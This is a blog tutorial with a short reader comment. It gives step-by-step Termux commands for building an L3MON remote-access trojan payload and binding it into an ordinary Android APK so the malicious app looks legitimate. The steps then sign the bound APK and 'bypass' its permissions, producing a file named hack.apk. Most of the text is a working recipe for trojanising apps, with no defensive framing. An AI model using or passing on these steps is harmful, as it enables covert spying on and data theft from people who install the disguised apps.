Hi guys welcome to the Mr.Ethical YT blog. If you are searching for "how to bind lemon rat payload with normal apps" then you are in the correct place and reading the right article. Today we are going to learn to bind lemon rat malacious payload with normal apk and thats pretends to be normal.
Requirements
- Apkmod
- Apkmod2
- Lemon Rat
Steps
apt-get update && apt-get upgrade-y
Give the storage permission to termux.
termux-setup-storage
Install wget package
pkg install wget
Download apkmod installer script.
wget https://raw.githubusercontent.com/Hax4us/Apkmod/master/setup.sh
Run the installer script.
bash setup.sh
Download apkmod .deb file and Lemon rat .deb file. Copy of them to termux home directory.
cp /sdcard/Download/apkmod2_1.3-4_aarch64.deb $HOME && cp sdcard/Download/lemon_2.1-2_all.deb $HOME
Install apkmod2 with dpkg.
dpkg -i apkmod2_1.3-4_aarch64.deb
Install lemon rat with dpkg.
dpkg -i lemon_2.1-2_all.deb
Run lemon to check is it installed.
lemon
The lemon server will start and stop it by clicking on CTRL and c.
Go to this directory /data/data/com.termux/files/usr/share/lemon/server
cd /data/data/com.termux/files/usr/share/lemon/server
Open maindb.json file with nano.
nano maindb.json
Copy this hash "81dc9bdb52d04dc20036dbd8313ed055" and paste in the password parameter.
81dc9bdb52d04dc20036dbd8313ed055
"password": "81dc9bdb52d04dc20036dbd8313ed055"
It should look like this.
Now save it by clicking CTRL and s then CTRL and x to exit.
Change directory to home.
cd $HOME
Run lemonrat server by the command lemon
lemon
Open browser and navigate to the url localhost:22553 and login with the username and password you had set while installation of lemonrat
localhost:22533
After login go to build section and enter the ip 127.0.0.1 then click on build wait until the payload gets builded.After building the payload.Choose the apk in which you want to bind the lemon rat payload.Copy the apk to termux home directory.
cp /pathtoyourapk $HOME
Then bind with the lemon payload with the command apkmod2 -i yourapkname.
apkmod2 -i yourapkname
It will take little bit time to bind the lemon rat payload with the orginal apk wait until it's get connected.The binded apk will be in the lemon directory with name of L3MON_binded.apk.
Now we need to sign the binded apk with apkmod.
apkmod -s -i lemon/L3MON_binded.apk -o $HOME/example.apk
Bypass the permissions with the command given below.
apkmod --enable=perm -i $HOME/example.apk -o $HOME/hack.apk
We had successfully binded the lemon rat payload with another apk and also bypassed the permissions.
Now copy the apk you bypassed the permissions to internal storage.
That's it for today guys we had successfully binded the lemon rat payload with another apk hope you learnt something new , let's meet in another post until then keep reading the other posts
It amazing🤩 bro Thanks brother 😇
ReplyDelete